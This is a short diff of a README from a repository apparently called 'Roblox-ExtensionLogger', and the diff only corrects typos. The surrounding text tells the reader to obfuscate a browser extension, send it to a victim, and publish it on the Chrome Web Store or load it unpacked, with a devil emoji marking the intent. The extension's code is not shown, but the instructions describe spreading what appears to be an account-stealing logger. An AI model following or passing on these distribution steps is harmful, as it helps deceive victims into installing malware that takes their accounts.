vaporha/Roblox-ExtensionLogger/README.md

 ```
 Obfustacte It Send It To A Vicim, You can learn how to publish an extension here: https://developer.chrome.com/docs/webstore/publish/.

-or Go to chrome://extensions/ turn on dev ode and click load unpack chose the file for the extension
+or Go to chrome://extensions/ turn on dev mode and click load unpack chose the file for the extension

-Lastly Edit the manifest.json file if you want to personalize the extension..😈
+Lastly Edit the manifest.json file if you want to personalize the extension.😈
 ```